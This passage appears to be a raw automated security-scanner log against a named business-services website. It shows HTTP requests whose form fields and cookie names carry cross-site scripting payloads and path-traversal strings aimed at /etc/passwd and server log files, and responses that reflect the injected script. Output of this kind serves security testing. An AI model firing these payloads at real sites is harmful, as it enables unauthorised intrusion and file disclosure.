Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 215
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName=Smith&lastName=Smith&parentPage=3&phone=3&src='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0011CA)%3c%2fscript%3e&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:39:49 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=354DBE6AA3704B2A0A7648954F993972; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <style>/* CSS Document */body{ line-height:18px; } #wrapper{ width:878px; margin:0 auto; padding-top:20px; } h11{ font:20px Verdana, Arial, Helvetica, sans-serif; margin:0px; padding:0px; } span.green{ color:#33a415; } h11 span.r{ font-size:14px; } h2{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#4f4f4f; margin:0px; padding:0; } h3{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } h4{ font:bold 16px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } .quote{ font:12px Verdana, Arial, Helvetica, sans-serif; line-height:20px; } .contentWrapper{ }/*--BOX BOX BOX--*/ .greyBox{ background:url(../images/box1.jpg) no-repeat left top #eeeeee; margin:15px 0; } .greyBox1{ background:url(../images/box2.jpg) no-repeat right top; } .greyBox2{ background:url(../images/box3.jpg) no-repeat right bottom; } .greyBox3{ background:url(../images/box4.jpg) no-repeat left bottom; padding:10px 15px; } .contactForm td{ padding:5px;}/*--BOX BOX BOX--*/ </style><div id="wrapper"><a class="secondaryAction" href="advertise.html" >Advertise</a> | <a class="secondaryAction" href="howitworks.html"> How It Works </a>|<a class="secondaryAction" style="margin-left:0;text-decoration:none;"><strong> Case Studies</strong> </a>|<a href="competitivecomparision.html" class="secondaryAction"> Competitive Comparison </a>|<a href="advertiserFAQs.html" class="secondaryAction"> Advertiser FAQs </a>|<a href="advertiserTerms.html" class="secondaryAction"> Advertiser Terms </a>|<a href="http://insideup.com/blogs/b2bleadgen" class="secondaryAction"> Marketing Blog </a>|<a href="marketingWhitepaper.html" class="secondaryAction"> Marketing Whitepaper </a><div class="contentWrapper"><table border="0" cellspacing="0" cellpadding="0"> <tr> <td scope="row" width="575"> <h11> <span style="font-size:15px;">TeleDirect Call Centers Case Study</span> |<a href="vocalocitycasestudy.html" style="font-size:15px;"> Vocalocity Voice Over IP Case Study</a> </h11> <br/><br/> <h2>The Leader in Call Center Services for Business Joins Forces with InsideUp to Dramatically Increase Sales Leads & Conversions</h2> <div> <div class="greyBox"> <div class="greyBox1"> <div class="greyBox2"> <div class="greyBox3"> <h3>InsideUp Client Overview</h3> TeleDirect Call Centers has been supporting the business community with outstanding call center services for 50 years and has grown into today's advanced, full-service provider of choice. TeleDirect employs more than 100 professional, courteous CSRs who present first-rate impressions for clients, and the firm deploys cutting-edge technology to handle any call volume. The firm has been on the Sacramento Business Journal's "Fastest Growing Companies" list for six consecutive years!</div> </div> </div> </div> </div> <img src="/images/partition_dash_bar.jpg" /> <img src="/images/tldr.jpg" alt="banner" border="0" usemap="#Map" /> <div class="quote"><span class="green">"</span>InsideUp far exceeded our expectations. InsideUp leads were not only qualified and verified..they were either warm or hot to the touch! Plus they were exactly the prospects that hit our sweet spot. Thanks to InsideUp, our business has grown significantly<span class="green">"</span> <strong style="color:#0066FF; display:block;">Tom Coshow, CEO TeleDirect</strong></div> <img src="/images/partition_dash_bar.jpg" /></td> <td valign="top" style=" padding-left:18px;"> <div style="padding:10px; background:#87baff; font:11px Verdana, Arial, Helvetica, sans-serif; line-height:18px;"> <form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="'"--></style></script><script>netsparker(0x0011CA)</script>"> <input type="hidden" name="parentPage" value="3"> <table class="contactForm" cellpadding="5"> <tr> <td colspan="2" class="head"><span style="color: #000; font-family: Arial,Helvetica,sans-serif; font-size: 17px; font-weight: bold; line-height:20px;">To get more information about becoming a marketing partner of InsideUp, complete and submit the form below:</span></td> </tr> <tr> <td width="108" style="width: 100px;">First Name</td> <td width="144" style="text-align: left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td align="left" valign="top"> <i..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
lastName POST Smith
parentPage POST 3
phone POST 3
src POST teledirectcasestudy
Submit POST 3
url POST '"--></style></script><script>alert(0x001228)</script>

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/teledirectcasestudy.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 233
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName=Smith&lastName=Smith&parentPage=3&phone=3&src=teledirectcasestudy&Submit=3&url='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001228)%3c%2fscript%3e

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:40:17 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=87DF53D1E9028AEE4C2DE8A9A419204F; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option 